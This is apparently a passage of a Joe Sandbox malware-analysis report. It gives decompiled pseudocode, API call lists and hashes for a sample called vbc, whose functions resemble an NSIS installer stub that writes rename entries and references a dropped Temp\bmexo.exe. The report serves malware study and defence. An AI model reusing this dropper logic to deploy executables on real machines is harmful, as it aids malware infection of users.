                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404897
                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048AC
                                          • GetDlgItem.USER32(?,0000040A), ref: 00404905
                                          • SendMessageW.USER32(00000000), ref: 0040490C
                                          • GetDlgItem.USER32(?,000003E8), ref: 00404937
                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040497A
                                          • LoadCursorW.USER32 ref: 00404988
                                          • SetCursor.USER32(00000000), ref: 0040498B
                                          • LoadCursorW.USER32 ref: 004049A4
                                          • SetCursor.USER32(00000000), ref: 004049A7
                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D6
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                          • String ID: @jz$N
                                          • API String ID: 3103080414-4087404676
                                          • Opcode ID: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
                                          • Instruction ID: a92c684f90d09e790cb96c84d129e3e4002e0b0c6609d0ca9bf02dd30757374c
                                          • Opcode Fuzzy Hash: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
                                          • Instruction Fuzzy Hash: D861A2B1900209BFDB109F61DD85AAA7BA9FB85315F00803AF705B62E1C77C9D51DF98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004062B4 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004062B4(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x7a5628 = 0x55004e;
				 *0x7a562c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x7a5e28
					_t12 = GetShortPathNameW( *_t2, 0x7a5e28, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x7a5228, "%ls=%ls\r\n", 0x7a5628, 0x7a5e28);
						_t53 = _t52 + 0x10;
						E004066AB(_t37, 0x400, 0x7a5e28, 0x7a5e28,  *((intOrPtr*)( *0x7a8ab0 + 0x128)));
						_t12 = E0040615E(0x7a5e28, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061E1(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060C3(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060C3(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406119(_t24 + _t46, 0x7a5228, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00406210(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040615E(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x7a5628, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                          0x004062b4
                                          0x004062bd
                                          0x004062c4
                                          0x004062ce
                                          0x004062e2
                                          0x0040630a
                                          0x00406311
                                          0x00406315
                                          0x00406319
                                          0x00406339
                                          0x00406340
                                          0x0040634a
                                          0x00406357
                                          0x0040635c
                                          0x00406361
                                          0x00406365
                                          0x00406374
                                          0x00406376
                                          0x00406383
                                          0x00406387
                                          0x00406422
                                          0x00000000
                                          0x0040639d
                                          0x004063aa
                                          0x004063ce
                                          0x004063d2
                                          0x004063f1
                                          0x004063f5
                                          0x004063f5
                                          0x004063f7
                                          0x00406400
                                          0x0040640b
                                          0x00406416
                                          0x0040641c
                                          0x00000000
                                          0x0040641c
                                          0x004063d4
                                          0x004063d7
                                          0x004063e2
                                          0x004063de
                                          0x004063e0
                                          0x004063e1
                                          0x004063e1
                                          0x004063e9
                                          0x004063eb
                                          0x00000000
                                          0x004063eb
                                          0x004063b5
                                          0x004063bb
                                          0x00000000
                                          0x004063bb
                                          0x00406387
                                          0x00406365
                                          0x004062e4
                                          0x004062ef
                                          0x004062f8
                                          0x004062fc
                                          0x00000000
                                          0x00000000
                                          0x004062fc
                                          0x0040642d

                                          APIs
                                          • CloseHandle.KERNEL32(00000000), ref: 004062EF
                                          • GetShortPathNameW.KERNEL32 ref: 004062F8
                                            • Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
                                            • Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105
                                          • GetShortPathNameW.KERNEL32 ref: 00406315
                                          • wsprintfA.USER32 ref: 00406333
                                          • GetFileSize.KERNEL32(00000000,00000000,007A5E28,C0000000,00000004,007A5E28,?,?,?,?,?), ref: 0040636E
                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040637D
                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063B5
                                          • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,007A5228,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040640B
                                          • GlobalFree.KERNEL32(00000000), ref: 0040641C
                                          • CloseHandle.KERNEL32(00000000), ref: 00406423
                                            • Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,007B6800,80000000,00000003), ref: 00406162
                                            • Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                          • String ID: %ls=%ls$(Vz$(^z$(^z$[Rename]
                                          • API String ID: 2171350718-2000197835
                                          • Opcode ID: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
                                          • Instruction ID: 6cadb61bc7003589c9facc341004653e1fa6c0793f9c109ef5d6a16b2289e69d
                                          • Opcode Fuzzy Hash: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
                                          • Instruction Fuzzy Hash: 2D313571600705BBD2206B669D48F1B3A9CEF85714F16003EFD42FA2C2DA7DD82586BD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a8ab0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x7a7aa0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8aa8;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                          0x0040100a
                                          0x00401039
                                          0x00401047
                                          0x0040104d
                                          0x00401051
                                          0x0040105b
                                          0x00401061
                                          0x00401064
                                          0x004010f3
                                          0x00401089
                                          0x0040108c
                                          0x004010a6
                                          0x004010bd
                                          0x004010cc
                                          0x004010cf
                                          0x004010d5
                                          0x004010d9
                                          0x004010e4
                                          0x004010ed
                                          0x004010ef
                                          0x004010ef
                                          0x00401100
                                          0x00401105
                                          0x0040110d
                                          0x00401110
                                          0x00401112
                                          0x00401118
                                          0x0040111f
                                          0x00401126
                                          0x00401130
                                          0x00401142
                                          0x00401156
                                          0x00401160
                                          0x00401165
                                          0x00401165
                                          0x00401110
                                          0x0040116e
                                          0x00000000
                                          0x00401178
                                          0x00401010
                                          0x00401013
                                          0x00401015
                                          0x0040101f
                                          0x0040101f
                                          0x00000000

                                          APIs
                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                          • BeginPaint.USER32(?,?), ref: 00401047
                                          • GetClientRect.USER32 ref: 0040105B
                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                          • FillRect.USER32 ref: 004010E4
                                          • DeleteObject.GDI32(?), ref: 004010ED
                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                          • DrawTextW.USER32(00000000,007A7AA0,000000FF,00000010,00000820), ref: 00401156
                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                          • DeleteObject.GDI32(?), ref: 00401165
                                          • EndPaint.USER32(?,?), ref: 0040116E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                          • String ID: F
                                          • API String ID: 941294808-1304234792
                                          • Opcode ID: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
                                          • Instruction ID: 97a6e5849d711934decb320d9e1447055a7c39d586dd296ee09aa65e352ff849
                                          • Opcode Fuzzy Hash: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
                                          • Instruction Fuzzy Hash: 83418C71800209AFCF058F95CE459AF7BB9FF45315F00802AF991AA1A0CB389A55DFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004066AB Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 72%
                                          			E004066AB(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x7a7a7c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x7a8ad8 + _t44 * 2;
				_t45 = 0x7a6a40;
				_t108 = 0x7a6a40;
				if(_a4 >= 0x7a6a40 && _a4 - 0x7a6a40 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E0040666E(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066AB(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x7a6a40;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x7a9000;
								E0040666E(_t108, (_t78 << 0xb) + 0x7a9000);
							} else {
								E004065B5(_t108,  *0x7a8aa8);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068F5(_t108);
							}
							goto L38;
						}
						if( *0x7a8b24 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x7a8aa4;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E0040653C( *0x7a8ad8, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8ad8 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066AB(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                                          0x004066ab
                                          0x004066ab
                                          0x004066ab
                                          0x004066b1
                                          0x004066b6
                                          0x004066c7
                                          0x004066c7
                                          0x004066cf
                                          0x004066d0
                                          0x004066d1
                                          0x004066d2
                                          0x004066d5
                                          0x004066dd
                                          0x004066df
                                          0x004066f0
                                          0x004066f3
                                          0x004066f3
                                          0x004066f7
                                          0x004066fd
                                          0x00406700
                                          0x004068db
                                          0x004068db
                                          0x004068e6
                                          0x004068f2
                                          0x004068f2
                                          0x00000000
                                          0x00406706
                                          0x0040670b
                                          0x00406720
                                          0x00406721
                                          0x00406727
                                          0x004068b9
                                          0x004068c7
                                          0x004068ca
                                          0x004068ca
                                          0x004068bb
                                          0x004068be
                                          0x004068c1
                                          0x004068c3
                                          0x004068c3
                                          0x004068cc
                                          0x004068cc
                                          0x004068d2
                                          0x004068d5
                                          0x00406708
                                          0x00000000
                                          0x00406708
                                          0x00000000
                                          0x004068d5
                                          0x0040672d
                                          0x00406730
                                          0x0040673f
                                          0x00406746
                                          0x00406752
                                          0x00406755
                                          0x00406758
                                          0x00406759
                                          0x0040675e
                                          0x00406764
                                          0x00406767
                                          0x0040676a
                                          0x0040685d
                                          0x00406862
                                          0x00406895
                                          0x0040689a
                                          0x0040689f
                                          0x004068a4
                                          0x004068a4
                                          0x004068a9
                                          0x004068af
                                          0x004068b2
                                          0x00000000
                                          0x004068b2
                                          0x00406864
                                          0x00406867
                                          0x0040686a
                                          0x0040687f
                                          0x00406886
                                          0x0040686c
                                          0x00406873
                                          0x00406873
                                          0x0040688e
                                          0x00406891
                                          0x00406855
                                          0x00406856
                                          0x00406856
                                          0x00000000
                                          0x00406891
                                          0x00406777
                                          0x0040677b
                                          0x0040677b
                                          0x0040677c
                                          0x0040677e
                                          0x004067bb
                                          0x004067be
                                          0x004067ce
                                          0x004067d1
                                          0x004067d9
                                          0x004067df
                                          0x004067df
                                          0x0040683a
                                          0x0040683a
                                          0x0040683c
                                          0x00000000
                                          0x00000000
                                          0x004067e3
                                          0x004067e8
                                          0x004067e9
                                          0x004067eb
                                          0x00406802
                                          0x00406810
                                          0x00406816
                                          0x00406818
                                          0x00406836
                                          0x00406836
                                          0x00406836
                                          0x00000000
                                          0x00406836
                                          0x0040681e
                                          0x00406827
                                          0x0040682a
                                          0x00406830
                                          0x00406834
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406834
                                          0x004067fc
                                          0x004067fe
                                          0x00406800
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406800
                                          0x00000000
                                          0x0040683a
                                          0x004067c6
                                          0x00000000
                                          0x00406780
                                          0x0040679e
                                          0x004067a7
                                          0x00406844
                                          0x00406848
                                          0x00406850
                                          0x00406850
                                          0x00000000
                                          0x00406848
                                          0x004067b1
                                          0x0040683e
                                          0x00406842
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406842
                                          0x0040677e
                                          0x00000000
                                          0x0040670b

                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,00000400), ref: 004067C6
                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,00000400,00000000,007A0F68,?,00405707,007A0F68,00000000,00000000,00000000,00000000), ref: 004067D9
                                          • lstrcatW.KERNEL32 ref: 00406850
                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: Directory$SystemWindowslstrcatlstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                          • API String ID: 4260037668-1458657875
                                          • Opcode ID: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
                                          • Instruction ID: c9eaf07520507b798c7259a568fd9567d3c8f5a418c476a208567326fda18bee
                                          • Opcode Fuzzy Hash: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
                                          • Instruction Fuzzy Hash: F061FF72902115AADF10AF68CC40BAE37A5AF55314F22C03FE947B62D0DB3D49A5CB89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404631 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00404631(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                          0x00404643
                                          0x004046f9
                                          0x00000000
                                          0x004046f9
                                          0x00404654
                                          0x00404658
                                          0x00000000
                                          0x00404672
                                          0x00404672
                                          0x0040467b
                                          0x00000000
                                          0x00000000
                                          0x0040467d
                                          0x00404689
                                          0x0040468c
                                          0x0040468c
                                          0x00404692
                                          0x00404698
                                          0x00404698
                                          0x004046a4
                                          0x004046aa
                                          0x004046b1
                                          0x004046b4
                                          0x004046b7
                                          0x004046b9
                                          0x004046b9
                                          0x004046c1
                                          0x004046c7
                                          0x004046c7
                                          0x004046d1
                                          0x004046d6
                                          0x004046d9
                                          0x004046de
                                          0x004046e1
                                          0x004046e1
                                          0x004046f1
                                          0x004046f1
                                          0x00000000
                                          0x004046f4

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
